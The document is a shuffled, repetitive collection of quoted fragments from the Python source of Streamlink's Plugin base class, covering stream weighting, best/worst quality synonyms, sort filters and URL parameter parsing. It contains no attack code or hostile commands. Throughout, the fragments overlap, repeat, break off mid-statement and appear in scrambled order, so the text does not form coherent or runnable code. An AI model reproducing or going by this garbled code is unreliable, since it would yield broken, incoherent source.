streams: if", "* as wildcard to match other stream types if \"*\"", "return not op(weight, filter_weight) return True return func def parse_url_params(url):", "= session def __init__(self, url): self.url = url @classmethod def", "stream_weight(quality) if group == filter_group: return not op(weight, filter_weight) return", "most commonly the quality and the value is a :class:`Stream`", "the filter \">480p\" will exclude streams ranked higher than \"480p\"", "best = sorted_streams[-1] worst = sorted_streams[0] final_sorted_streams[\"worst\"] = streams[worst] final_sorted_streams[\"best\"]", "NO_PRIORITY = 0 def stream_weight(stream): for group, weights in QUALITY_WEIGTHS_EXTRA.items():", "in weights: return weights[stream], group match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream) if", "+= \"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg) def decorator(*args, **kwargs): return", ":param stream_types: A list of stream types to return. :param", "default_stream_types(cls, streams): stream_types = [\"rtmp\", \"hls\", \"hds\", \"http\"] for name,", "stream_type not in stream_types: continue # drop _alt from any", "will exclude streams ranked higher than \"480p\" from the list", "stream if it's bad. match = re.match(\"([A-z0-9_+]+)\", name) if match:", "sorted_streams[0] final_sorted_streams[\"worst\"] = streams[worst] final_sorted_streams[\"best\"] = streams[best] return final_sorted_streams def", "The synonyms can be fine tuned with the *sorting_excludes* parameter.", "sorted_streams: stream_type = type(stream).shortname() # Use * as wildcard to", "iterate_streams(streams): stream_type = type(stream).shortname() if stream_type not in stream_types: stream_types.append(stream_type)", "if match.group(7): weight -= ALT_WEIGHT_MOD * int(match.group(7)) else: weight -=", "a bitrate's # weight end up similar to the weight", "Added *sorting_excludes* parameter. .. versionchanged:: 1.6.0 *sorting_excludes* can now be", "\"\"\" return self.streams(*args, **kwargs) def _get_streams(self): raise NotImplementedError __all__ =", "576, \"sq\": 360, }, } FILTER_OPERATORS = { \"<\": operator.lt,", "func def parse_url_params(url): split = url.split(\" \", 1) url =", "priority. :return: priority level \"\"\" return NORMAL_PRIORITY def streams(self, stream_types=None,", "parse_params(params): rval = {} matches = re.findall(PARAMS_REGEX, params) for key,", "stream_type = type(stream).shortname() if stream_type not in stream_types: stream_types.append(stream_type) return", "Return the plugin priority for a given URL, by default", "any stream names if name.endswith(\"_alt\"): name = name[:-len(\"_alt\")] existing =", "msg += \"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg) def decorator(*args, **kwargs):", "match.group(2) if name_type == \"k\": # bit rate bitrate =", "params) for key, value in matches: try: value = ast.literal_eval(value)", "same name are found, the order of streams specified in", "as wildcard to match other stream types if \"*\" not", "no operator is specified then equality will be tested. -", "isinstance(sorting_excludes, list): for expr in sorting_excludes: filter_func = stream_sorting_filter(expr, self.stream_weight)", "-= ALT_WEIGHT_MOD * int(match.group(7)) else: weight -= ALT_WEIGHT_MOD name_type =", "(self.stream_weight(s)[0] or (len(streams) == 1 and 1)) stream_names = filter(stream_weight_only,", "= sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list): for expr in sorting_excludes:", "highest and lowest quality respectively. If multiple streams with the", "so we can reuse it. if ostreams: ostreams = list(ostreams)", "*stream_types* and changed behaviour slightly. .. versionchanged:: 1.5.0 Added *sorting_excludes*", "\"\"\"A plugin can retrieve stream information from the URL specified.", "the rest will be renamed to \"<name>_<stream type>\". The synonyms", "1.9.0. Has been renamed to :func:`Plugin.streams`, this is an alias", "this is an alias for backwards compatibility. \"\"\" return self.streams(*args,", "for resolution weight += int(match.group(5)) / BIT_RATE_WEIGHT_RATIO return weight, \"pixels\"", "name, stream in iterate_streams(streams): stream_type = type(stream).shortname() if stream_type not", "the *sorting_excludes* parameter. This can be either of these types:", "= \"{0}_alt\".format(name) num_alts = len(list(filter(lambda n: n.startswith(name), streams.keys()))) # We", "quality and the value is a :class:`Stream` object. The result", "return func return decorator @classmethod def priority(cls, url): \"\"\" Return", "types: - A list of filter expressions in the format", "key=partial(stream_type_priority, stream_types)) streams = {} for name, stream in sorted_streams:", "stream_type not in stream_types: stream_types.append(stream_type) return stream_types @classmethod def broken(cls,", "= type(stream[1]).shortname() try: prio = stream_types.index(stream_type) except ValueError: try: prio", "a list so we can reuse it. if ostreams: ostreams", "if match: name = match.group(1) else: self.logger.debug(\"The stream '{0}' has", "} FILTER_OPERATORS = { \"<\": operator.lt, \"<=\": operator.le, \">\": operator.gt,", "\"k\": # bit rate bitrate = int(match.group(1)) weight += bitrate", "@classmethod def stream_weight(cls, stream): return stream_weight(stream) @classmethod def default_stream_types(cls, streams):", "it's bad. match = re.match(\"([A-z0-9_+]+)\", name) if match: name =", "determine which stream gets to keep the name while the", "weight += 1 if match.group(5): # bit rate classifier for", "behaviour slightly. .. versionchanged:: 1.5.0 Added *sorting_excludes* parameter. .. versionchanged::", "can contain the synonyms **best** and **worst** which points to", "to keep the name while the rest will be renamed", "is likely due to \" \"changes to the service preventing", "ostreams: return {} if stream_types is None: stream_types = self.default_stream_types(ostreams)", "streams[worst] final_sorted_streams[\"best\"] = streams[best] return final_sorted_streams def get_streams(self, *args, **kwargs):", "fps eg. 60p or 50p weight += int(match.group(3)) if match.group(4)", "filter_weight, filter_group = stream_weight(value) def func(quality): weight, group = stream_weight(quality)", "sorting_excludes: filter_func = stream_sorting_filter(expr, self.stream_weight) sorted_streams = list(filter(filter_func, sorted_streams)) elif", "self.url = url @classmethod def can_handle_url(cls, url): raise NotImplementedError @classmethod", "if name_type == \"k\": # bit rate bitrate = int(match.group(1))", "\"480p\" from the list used in the synonyms ranking. Valid", "sub_stream in stream: yield (name, sub_stream) else: yield (name, stream)", "session, module): cls.cache = Cache(filename=\"plugin-cache.json\", key_prefix=module) cls.logger = session.logger.new_module(\"plugin.\" +", "= type(stream).shortname() # Use * as wildcard to match other", "1080, }, \"tv\": { \"hd\": 1080, \"sd\": 576, }, \"quality\":", "match.group(3): # fps eg. 60p or 50p weight += int(match.group(3))", "streams[name.lower()] = stream # Create the best/worst synonmys def stream_weight_only(s):", "existing_stream_type != stream_type: name = \"{0}_{1}\".format(name, stream_type) if name in", "streams.get(name) if existing: existing_stream_type = type(existing).shortname() if existing_stream_type != stream_type:", "return prio def stream_sorting_filter(expr, stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if", "key is the name of the stream, most commonly the", "be tested. - A function that is passed to filter()", "== \"+\": weight += 1 if match.group(5): # bit rate", "URL, by default it returns NORMAL priority. :return: priority level", "the best/worst synonmys def stream_weight_only(s): return (self.stream_weight(s)[0] or (len(streams) ==", "Cache(filename=\"plugin-cache.json\", key_prefix=module) cls.logger = session.logger.new_module(\"plugin.\" + module) cls.module = module", "will be tested. - A function that is passed to", "weight -= ALT_WEIGHT_MOD name_type = match.group(2) if name_type == \"k\":", "if len(split) > 1 else '' return url, parse_params(params) def", "is passed to filter(). \"\"\" try: ostreams = self._get_streams() if", "worst = sorted_streams[0] final_sorted_streams[\"worst\"] = streams[worst] final_sorted_streams[\"best\"] = streams[best] return", "..options import Options # FIXME: This is a crude attempt", "1) # Validate stream name and discard the stream if", "service preventing a working implementation. \" ) if issue: msg", "while the rest will be renamed to \"<name>_<stream type>\". The", "resolution weight += int(match.group(1)) if match.group(3): # fps eg. 60p", "rval class Plugin(object): \"\"\"A plugin can retrieve stream information from", "match: weight = 0 if match.group(6): if match.group(7): weight -=", "If no operator is specified then equality will be tested.", "\"tv\": { \"hd\": 1080, \"sd\": 576, }, \"quality\": { \"ehq\":", "return (self.stream_weight(s)[0] or (len(streams) == 1 and 1)) stream_names =", "need more than 2 alt streams if num_alts >= 2:", "stream # Create the best/worst synonmys def stream_weight_only(s): return (self.stream_weight(s)[0]", "session.logger.new_module(\"plugin.\" + module) cls.module = module cls.session = session def", "stream_type = type(stream[1]).shortname() try: prio = stream_types.index(stream_type) except ValueError: try:", "stream_types = [\"rtmp\", \"hls\", \"hds\", \"http\"] for name, stream in", "= 30 NORMAL_PRIORITY = 20 LOW_PRIORITY = 10 NO_PRIORITY =", "if match.group(6): if match.group(7): weight -= ALT_WEIGHT_MOD * int(match.group(7)) else:", "try: prio = stream_types.index(stream_type) except ValueError: try: prio = stream_types.index(\"*\")", "given URL, by default it returns NORMAL priority. :return: priority", "len(list(filter(lambda n: n.startswith(name), streams.keys()))) # We shouldn't need more than", "discard the stream if it's bad. match = re.match(\"([A-z0-9_+]+)\", name)", "return weight, \"pixels\" return 0, \"none\" def iterate_streams(streams): for name,", "re.match(\"([A-z0-9_+]+)\", name) if match: name = match.group(1) else: self.logger.debug(\"The stream", "(len(streams) == 1 and 1)) stream_names = filter(stream_weight_only, streams.keys()) sorted_streams", "stream gets to keep the name while the rest will", "# We shouldn't need more than 2 alt streams if", "to *stream_types* and changed behaviour slightly. .. versionchanged:: 1.5.0 Added", "who knows math, please fix. BIT_RATE_WEIGHT_RATIO = 2.8 ALT_WEIGHT_MOD =", "stream_types: stream_types.append(stream_type) return stream_types @classmethod def broken(cls, issue=None): def func(*args,", "is badly named.\", name) continue # Force lowercase name and", "match: name = match.group(1) else: self.logger.debug(\"The stream '{0}' has been", "it. if ostreams: ostreams = list(ostreams) except NoStreamsError: return {}", "stream names if name.endswith(\"_alt\"): name = name[:-len(\"_alt\")] existing = streams.get(name)", "self.stream_weight) sorted_streams = list(filter(filter_func, sorted_streams)) elif callable(sorting_excludes): sorted_streams = list(filter(sorting_excludes,", "keep the name while the rest will be renamed to", "+= bitrate / BIT_RATE_WEIGHT_RATIO return weight, \"bitrate\" elif name_type ==", "to :func:`Plugin.streams`, this is an alias for backwards compatibility. \"\"\"", "broken(cls, issue=None): def func(*args, **kwargs): msg = ( \"This plugin", "int(match.group(1)) weight += bitrate / BIT_RATE_WEIGHT_RATIO return weight, \"bitrate\" elif", "\"sd\": 576, }, \"quality\": { \"ehq\": 720, \"hq\": 576, \"sq\":", "quality respectively. If multiple streams with the same name are", "of filter expressions or a function that is passed to", "if name in streams: name = \"{0}_alt\".format(name) num_alts = len(list(filter(lambda", "\">\": operator.gt, \">=\": operator.ge, } PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY =", "isinstance(ostreams, dict): ostreams = ostreams.items() # Flatten the iterator to", "\">480p\" will exclude streams ranked higher than \"480p\" from the", "stream type and priorities sorted_streams = sorted(iterate_streams(ostreams), key=partial(stream_type_priority, stream_types)) streams", "ostreams = self._get_streams() if isinstance(ostreams, dict): ostreams = ostreams.items() #", "streams[stream_name] if len(sorted_streams) > 0: best = sorted_streams[-1] worst =", "names as input. :param stream_types: A list of stream types", "re from collections import OrderedDict from functools import partial from", "URL that the plugin will operate on \"\"\" cache =", "marked as broken. This is likely due to \" \"changes", "= 2.8 ALT_WEIGHT_MOD = 0.01 QUALITY_WEIGTHS_EXTRA = { \"other\": {", "\"live\": 1080, }, \"tv\": { \"hd\": 1080, \"sd\": 576, },", "in sorted_streams: stream_type = type(stream).shortname() # Use * as wildcard", "..exceptions import PluginError, NoStreamsError from ..options import Options # FIXME:", "been ignored \" \"since it is badly named.\", name) continue", "plugin can retrieve stream information from the URL specified. :param", "parse_params(params) def parse_params(params): rval = {} matches = re.findall(PARAMS_REGEX, params)", "stream in iterate_streams(streams): stream_type = type(stream).shortname() if stream_type not in", "0: name = \"{0}{1}\".format(name, num_alts + 1) # Validate stream", "import ast import operator import re from collections import OrderedDict", "for a given URL, by default it returns NORMAL priority.", "match.group(6): if match.group(7): weight -= ALT_WEIGHT_MOD * int(match.group(7)) else: weight", "key): return cls.options.get(key) @classmethod def stream_weight(cls, stream): return stream_weight(stream) @classmethod", "parameter. .. versionchanged:: 1.5.0 Renamed *priority* to *stream_types* and changed", "matches: try: value = ast.literal_eval(value) except Exception: pass rval[key] =", "def default_stream_types(cls, streams): stream_types = [\"rtmp\", \"hls\", \"hds\", \"http\"] for", "\"ehq\": 720, \"hq\": 576, \"sq\": 360, }, } FILTER_OPERATORS =", "PluginError(err) if not ostreams: return {} if stream_types is None:", "if ostreams: ostreams = list(ostreams) except NoStreamsError: return {} except", "if stream_types is None: stream_types = self.default_stream_types(ostreams) # Add streams", "streams(self, stream_types=None, sorting_excludes=None): \"\"\"Attempts to extract available streams. Returns a", "import PluginError, NoStreamsError from ..options import Options # FIXME: This", "stream_type_priority(stream_types, stream): stream_type = type(stream[1]).shortname() try: prio = stream_types.index(stream_type) except", "bit rate classifier for resolution weight += int(match.group(5)) / BIT_RATE_WEIGHT_RATIO", "PluginError(\"Invalid filter expression: {0}\".format(expr)) op, value = match.group(\"op\", \"value\") op", "and stream_type not in stream_types: continue # drop _alt from", "rate bitrate = int(match.group(1)) weight += bitrate / BIT_RATE_WEIGHT_RATIO return", "of streams specified in *stream_types* will determine which stream gets", "if name.endswith(\"_alt\"): name = name[:-len(\"_alt\")] existing = streams.get(name) if existing:", "name[:-len(\"_alt\")] existing = streams.get(name) if existing: existing_stream_type = type(existing).shortname() if", "import re from collections import OrderedDict from functools import partial", "default it returns NORMAL priority. :return: priority level \"\"\" return", "If multiple streams with the same name are found, the", "\"This plugin has been marked as broken. This is likely", "format *[operator]<value>*. For example the filter \">480p\" will exclude streams", "to extract available streams. Returns a :class:`dict` containing the streams,", "= stream_weight(value) def func(quality): weight, group = stream_weight(quality) if group", "filter expressions in the format *[operator]<value>*. For example the filter", "that is passed to filter(). \"\"\" try: ostreams = self._get_streams()", "be fine tuned with the *sorting_excludes* parameter. This can be", "ostreams = list(ostreams) except NoStreamsError: return {} except (IOError, OSError,", "= streams.get(name) if existing: existing_stream_type = type(existing).shortname() if existing_stream_type !=", "sorted_streams[-1] worst = sorted_streams[0] final_sorted_streams[\"worst\"] = streams[worst] final_sorted_streams[\"best\"] = streams[best]", "*priority* to *stream_types* and changed behaviour slightly. .. versionchanged:: 1.5.0", "existing_stream_type = type(existing).shortname() if existing_stream_type != stream_type: name = \"{0}_{1}\".format(name,", "parameter. This can be either of these types: - A", "class Plugin(object): \"\"\"A plugin can retrieve stream information from the", "= OrderedDict() for stream_name in sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name] = streams[stream_name]", "= streams[best] return final_sorted_streams def get_streams(self, *args, **kwargs): \"\"\"Deprecated since", "self._get_streams() if isinstance(ostreams, dict): ostreams = ostreams.items() # Flatten the", "{ \"<\": operator.lt, \"<=\": operator.le, \">\": operator.gt, \">=\": operator.ge, }", "match.group(4) == \"+\": weight += 1 if match.group(5): # bit", "crude attempt at making a bitrate's # weight end up", "func(quality): weight, group = stream_weight(quality) if group == filter_group: return", "\" ) if issue: msg += \"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise", "\"\"\" cache = None logger = None module = \"unknown\"", "respectively. If multiple streams with the same name are found,", "either of these types: - A list of filter expressions", "expressions in the format *[operator]<value>*. For example the filter \">480p\"", "0.01 QUALITY_WEIGTHS_EXTRA = { \"other\": { \"live\": 1080, }, \"tv\":", "= \"{0}{1}\".format(name, num_alts + 1) # Validate stream name and", "msg = ( \"This plugin has been marked as broken.", "{} if stream_types is None: stream_types = self.default_stream_types(ostreams) # Add", "from any stream names if name.endswith(\"_alt\"): name = name[:-len(\"_alt\")] existing", "name and replace space with underscore. streams[name.lower()] = stream #", "and replace space with underscore. streams[name.lower()] = stream # Create", "decorator(*args, **kwargs): return func return decorator @classmethod def priority(cls, url):", "weight += int(match.group(1)) if match.group(3): # fps eg. 60p or", "module): cls.cache = Cache(filename=\"plugin-cache.json\", key_prefix=module) cls.logger = session.logger.new_module(\"plugin.\" + module)", "to a list so we can reuse it. if ostreams:", "Force lowercase name and replace space with underscore. streams[name.lower()] =", "= split[0] params = split[1] if len(split) > 1 else", "the name of the stream, most commonly the quality and", "the key is the name of the stream, most commonly", "return. :param sorting_excludes: Specify which streams to exclude from the", "from the best/worst synonyms. .. versionchanged:: 1.4.2 Added *priority* parameter.", "QUALITY_WEIGTHS_EXTRA.items(): if stream in weights: return weights[stream], group match =", "name) if match: name = match.group(1) else: self.logger.debug(\"The stream '{0}'", "and lowest quality respectively. If multiple streams with the same", "= 0.01 QUALITY_WEIGTHS_EXTRA = { \"other\": { \"live\": 1080, },", "not in stream_types: continue # drop _alt from any stream", "= {} matches = re.findall(PARAMS_REGEX, params) for key, value in", "synonyms ranking. Valid operators are >, >=, < and <=.", ":class:`dict` containing the streams, where the key is the name", "likely to be of highest and lowest quality respectively. If", "else: self.logger.debug(\"The stream '{0}' has been ignored \" \"since it", "name = \"{0}_{1}\".format(name, stream_type) if name in streams: name =", "the URL specified. :param url: URL that the plugin will", "tuned with the *sorting_excludes* parameter. This can be either of", "stream_types)) streams = {} for name, stream in sorted_streams: stream_type", "# resolution weight += int(match.group(1)) if match.group(3): # fps eg.", "attempt at making a bitrate's # weight end up similar", "len(split) > 1 else '' return url, parse_params(params) def parse_params(params):", "Add streams depending on stream type and priorities sorted_streams =", "classifier for resolution weight += int(match.group(5)) / BIT_RATE_WEIGHT_RATIO return weight,", "to the streams which are likely to be of highest", "that is passed to filter() with a list of stream", "we can reuse it. if ostreams: ostreams = list(ostreams) except", "return func def parse_url_params(url): split = url.split(\" \", 1) url", "plugin will operate on \"\"\" cache = None logger =", "on \"\"\" cache = None logger = None module =", "ignored \" \"since it is badly named.\", name) continue #", "FILTER_OPERATORS.get(op, operator.eq) filter_weight, filter_group = stream_weight(value) def func(quality): weight, group", "weight, \"pixels\" return 0, \"none\" def iterate_streams(streams): for name, stream", "\"quality\": { \"ehq\": 720, \"hq\": 576, \"sq\": 360, }, }", "For example the filter \">480p\" will exclude streams ranked higher", "ALT_WEIGHT_MOD = 0.01 QUALITY_WEIGTHS_EXTRA = { \"other\": { \"live\": 1080,", "if match: weight = 0 if match.group(6): if match.group(7): weight", "cls.session = session def __init__(self, url): self.url = url @classmethod", "stream '{0}' has been ignored \" \"since it is badly", "changed behaviour slightly. .. versionchanged:: 1.5.0 Added *sorting_excludes* parameter. ..", "= stream_sorting_filter(expr, self.stream_weight) sorted_streams = list(filter(filter_func, sorted_streams)) elif callable(sorting_excludes): sorted_streams", "Valid operators are >, >=, < and <=. If no", "renamed to \"<name>_<stream type>\". The synonyms can be fine tuned", "ostreams.items() # Flatten the iterator to a list so we", "# FIXME: This is a crude attempt at making a", ">=, < and <=. If no operator is specified then", "versionchanged:: 1.4.2 Added *priority* parameter. .. versionchanged:: 1.5.0 Renamed *priority*", "/ BIT_RATE_WEIGHT_RATIO return weight, \"bitrate\" elif name_type == \"p\": #", "final_sorted_streams[\"worst\"] = streams[worst] final_sorted_streams[\"best\"] = streams[best] return final_sorted_streams def get_streams(self,", "}, \"tv\": { \"hd\": 1080, \"sd\": 576, }, \"quality\": {", "Added *priority* parameter. .. versionchanged:: 1.5.0 Renamed *priority* to *stream_types*", "in stream_types and stream_type not in stream_types: continue # drop", "\"p\": # resolution weight += int(match.group(1)) if match.group(3): # fps", "available streams. Returns a :class:`dict` containing the streams, where the", "value = ast.literal_eval(value) except Exception: pass rval[key] = value return", "list used in the synonyms ranking. Valid operators are >,", "def decorator(*args, **kwargs): return func return decorator @classmethod def priority(cls,", "prio def stream_sorting_filter(expr, stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not", "raise PluginError(err) if not ostreams: return {} if stream_types is", "group == filter_group: return not op(weight, filter_weight) return True return", "for name, stream in iterate_streams(streams): stream_type = type(stream).shortname() if stream_type", "with the *sorting_excludes* parameter. This can be either of these", "operator.le, \">\": operator.gt, \">=\": operator.ge, } PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY", "sorted_streams = list(filter(sorting_excludes, sorted_streams)) final_sorted_streams = OrderedDict() for stream_name in", "*sorting_excludes* parameter. This can be either of these types: -", "= type(stream).shortname() if stream_type not in stream_types: stream_types.append(stream_type) return stream_types", "now be a list of filter expressions or a function", "sorted_streams)) final_sorted_streams = OrderedDict() for stream_name in sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name]", "{} for name, stream in sorted_streams: stream_type = type(stream).shortname() #", "streams depending on stream type and priorities sorted_streams = sorted(iterate_streams(ostreams),", "Someone who knows math, please fix. BIT_RATE_WEIGHT_RATIO = 2.8 ALT_WEIGHT_MOD", "return NORMAL_PRIORITY def streams(self, stream_types=None, sorting_excludes=None): \"\"\"Attempts to extract available", "2.8 ALT_WEIGHT_MOD = 0.01 QUALITY_WEIGTHS_EXTRA = { \"other\": { \"live\":", "list of stream names as input. :param stream_types: A list", "None logger = None module = \"unknown\" options = Options()", "specified. :param url: URL that the plugin will operate on", ":func:`Plugin.streams`, this is an alias for backwards compatibility. \"\"\" return", "# bit rate bitrate = int(match.group(1)) weight += bitrate /", "..cache import Cache from ..exceptions import PluginError, NoStreamsError from ..options", "if \"*\" not in stream_types and stream_type not in stream_types:", "if match.group(5): # bit rate classifier for resolution weight +=", "match: raise PluginError(\"Invalid filter expression: {0}\".format(expr)) op, value = match.group(\"op\",", "Has been renamed to :func:`Plugin.streams`, this is an alias for", "to the weight of a resolution. # Someone who knows", "to filter() with a list of stream names as input.", "= streams[worst] final_sorted_streams[\"best\"] = streams[best] return final_sorted_streams def get_streams(self, *args,", "match.group(7): weight -= ALT_WEIGHT_MOD * int(match.group(7)) else: weight -= ALT_WEIGHT_MOD", "== \"p\": # resolution weight += int(match.group(1)) if match.group(3): #", "is specified then equality will be tested. - A function", "in streams: name = \"{0}_alt\".format(name) num_alts = len(list(filter(lambda n: n.startswith(name),", "ast import operator import re from collections import OrderedDict from", "filter(). \"\"\" try: ostreams = self._get_streams() if isinstance(ostreams, dict): ostreams", "on stream type and priorities sorted_streams = sorted(iterate_streams(ostreams), key=partial(stream_type_priority, stream_types))", "return {} if stream_types is None: stream_types = self.default_stream_types(ostreams) #", "in sorting_excludes: filter_func = stream_sorting_filter(expr, self.stream_weight) sorted_streams = list(filter(filter_func, sorted_streams))", "type and priorities sorted_streams = sorted(iterate_streams(ostreams), key=partial(stream_type_priority, stream_types)) streams =", "group match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream) if match: weight = 0", "> 0: name = \"{0}{1}\".format(name, num_alts + 1) # Validate", "that the plugin will operate on \"\"\" cache = None", "= value return rval class Plugin(object): \"\"\"A plugin can retrieve", "0 def stream_weight(stream): for group, weights in QUALITY_WEIGTHS_EXTRA.items(): if stream", "*stream_types* will determine which stream gets to keep the name", "dict): ostreams = ostreams.items() # Flatten the iterator to a", "are found, the order of streams specified in *stream_types* will", "self.logger.debug(\"The stream '{0}' has been ignored \" \"since it is", "{ \"other\": { \"live\": 1080, }, \"tv\": { \"hd\": 1080,", "module) cls.module = module cls.session = session def __init__(self, url):", "= None @classmethod def bind(cls, session, module): cls.cache = Cache(filename=\"plugin-cache.json\",", "= { \"other\": { \"live\": 1080, }, \"tv\": { \"hd\":", "\"changes to the service preventing a working implementation. \" )", "name_type = match.group(2) if name_type == \"k\": # bit rate", "list(filter(filter_func, sorted_streams)) elif callable(sorting_excludes): sorted_streams = list(filter(sorting_excludes, sorted_streams)) final_sorted_streams =", "@classmethod def set_option(cls, key, value): cls.options.set(key, value) @classmethod def get_option(cls,", "stream types to return. :param sorting_excludes: Specify which streams to", "the best/worst synonyms. .. versionchanged:: 1.4.2 Added *priority* parameter. ..", "= match.group(2) if name_type == \"k\": # bit rate bitrate", "- A list of filter expressions in the format *[operator]<value>*.", "list): for expr in sorting_excludes: filter_func = stream_sorting_filter(expr, self.stream_weight) sorted_streams", "level \"\"\" return NORMAL_PRIORITY def streams(self, stream_types=None, sorting_excludes=None): \"\"\"Attempts to", "NoStreamsError: return {} except (IOError, OSError, ValueError) as err: raise", "30 NORMAL_PRIORITY = 20 LOW_PRIORITY = 10 NO_PRIORITY = 0", "which points to the streams which are likely to be", "is None: stream_types = self.default_stream_types(ostreams) # Add streams depending on", "key, value in matches: try: value = ast.literal_eval(value) except Exception:", "\"http\"] for name, stream in iterate_streams(streams): stream_type = type(stream).shortname() if", "group, weights in QUALITY_WEIGTHS_EXTRA.items(): if stream in weights: return weights[stream],", "= re.findall(PARAMS_REGEX, params) for key, value in matches: try: value", "synonyms **best** and **worst** which points to the streams which", "name) continue # Force lowercase name and replace space with", "operator.lt, \"<=\": operator.le, \">\": operator.gt, \">=\": operator.ge, } PARAMS_REGEX =", "cls.options.get(key) @classmethod def stream_weight(cls, stream): return stream_weight(stream) @classmethod def default_stream_types(cls,", "*sorting_excludes* parameter. .. versionchanged:: 1.6.0 *sorting_excludes* can now be a", "split[1] if len(split) > 1 else '' return url, parse_params(params)", "used in the synonyms ranking. Valid operators are >, >=,", "streams to exclude from the best/worst synonyms. .. versionchanged:: 1.4.2", "@classmethod def priority(cls, url): \"\"\" Return the plugin priority for", "types to return. :param sorting_excludes: Specify which streams to exclude", "import Options # FIXME: This is a crude attempt at", "contain the synonyms **best** and **worst** which points to the", "Specify which streams to exclude from the best/worst synonyms. ..", "OrderedDict from functools import partial from ..cache import Cache from", "int(match.group(7)) else: weight -= ALT_WEIGHT_MOD name_type = match.group(2) if name_type", "1 if match.group(5): # bit rate classifier for resolution weight", "then equality will be tested. - A function that is", "*[operator]<value>*. For example the filter \">480p\" will exclude streams ranked", "expr) if not match: raise PluginError(\"Invalid filter expression: {0}\".format(expr)) op,", "return weights[stream], group match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream) if match: weight", "if existing_stream_type != stream_type: name = \"{0}_{1}\".format(name, stream_type) if name", "the weight of a resolution. # Someone who knows math,", "stream_types is None: stream_types = self.default_stream_types(ostreams) # Add streams depending", "group = stream_weight(quality) if group == filter_group: return not op(weight,", "def func(*args, **kwargs): msg = ( \"This plugin has been", "\"*\" not in stream_types and stream_type not in stream_types: continue", "\"pixels\" return 0, \"none\" def iterate_streams(streams): for name, stream in", "name, stream in streams: if isinstance(stream, list): for sub_stream in", "filter_group = stream_weight(value) def func(quality): weight, group = stream_weight(quality) if", "Validate stream name and discard the stream if it's bad.", "re.findall(PARAMS_REGEX, params) for key, value in matches: try: value =", "def func(quality): weight, group = stream_weight(quality) if group == filter_group:", "Cache from ..exceptions import PluginError, NoStreamsError from ..options import Options", "Renamed *priority* to *stream_types* and changed behaviour slightly. .. versionchanged::", "return final_sorted_streams def get_streams(self, *args, **kwargs): \"\"\"Deprecated since version 1.9.0.", "renamed to :func:`Plugin.streams`, this is an alias for backwards compatibility.", "if num_alts >= 2: continue elif num_alts > 0: name", "the streams which are likely to be of highest and", "return True return func def parse_url_params(url): split = url.split(\" \",", "found, the order of streams specified in *stream_types* will determine", "elif num_alts > 0: name = \"{0}{1}\".format(name, num_alts + 1)", "stream_weight(cls, stream): return stream_weight(stream) @classmethod def default_stream_types(cls, streams): stream_types =", "has been marked as broken. This is likely due to", "the order of streams specified in *stream_types* will determine which", "value return rval class Plugin(object): \"\"\"A plugin can retrieve stream", "len(sorted_streams) > 0: best = sorted_streams[-1] worst = sorted_streams[0] final_sorted_streams[\"worst\"]", "parameter. .. versionchanged:: 1.6.0 *sorting_excludes* can now be a list", "= re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream) if match: weight = 0 if match.group(6):", "name are found, the order of streams specified in *stream_types*", "= stream_weight(quality) if group == filter_group: return not op(weight, filter_weight)", "stream_weight(stream): for group, weights in QUALITY_WEIGTHS_EXTRA.items(): if stream in weights:", "return self.streams(*args, **kwargs) def _get_streams(self): raise NotImplementedError __all__ = [\"Plugin\"]", "URL specified. :param url: URL that the plugin will operate", "value) @classmethod def get_option(cls, key): return cls.options.get(key) @classmethod def stream_weight(cls,", "try: prio = stream_types.index(\"*\") except ValueError: prio = 99 return", "prio = 99 return prio def stream_sorting_filter(expr, stream_weight): match =", "= session.logger.new_module(\"plugin.\" + module) cls.module = module cls.session = session", "sorted_streams)) elif callable(sorting_excludes): sorted_streams = list(filter(sorting_excludes, sorted_streams)) final_sorted_streams = OrderedDict()", "== 1 and 1)) stream_names = filter(stream_weight_only, streams.keys()) sorted_streams =", "weights[stream], group match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream) if match: weight =", "2 alt streams if num_alts >= 2: continue elif num_alts", "rest will be renamed to \"<name>_<stream type>\". The synonyms can", "passed to filter() with a list of stream names as", "get_option(cls, key): return cls.options.get(key) @classmethod def stream_weight(cls, stream): return stream_weight(stream)", "if match.group(4) == \"+\": weight += 1 if match.group(5): #", "def stream_weight(stream): for group, weights in QUALITY_WEIGTHS_EXTRA.items(): if stream in", "resolution weight += int(match.group(5)) / BIT_RATE_WEIGHT_RATIO return weight, \"pixels\" return", "in stream: yield (name, sub_stream) else: yield (name, stream) def", "type(stream).shortname() # Use * as wildcard to match other stream", "/ BIT_RATE_WEIGHT_RATIO return weight, \"pixels\" return 0, \"none\" def iterate_streams(streams):", "= 0 def stream_weight(stream): for group, weights in QUALITY_WEIGTHS_EXTRA.items(): if", ":return: priority level \"\"\" return NORMAL_PRIORITY def streams(self, stream_types=None, sorting_excludes=None):", "= list(ostreams) except NoStreamsError: return {} except (IOError, OSError, ValueError)", "= list(filter(filter_func, sorted_streams)) elif callable(sorting_excludes): sorted_streams = list(filter(sorting_excludes, sorted_streams)) final_sorted_streams", "= sorted_streams[-1] worst = 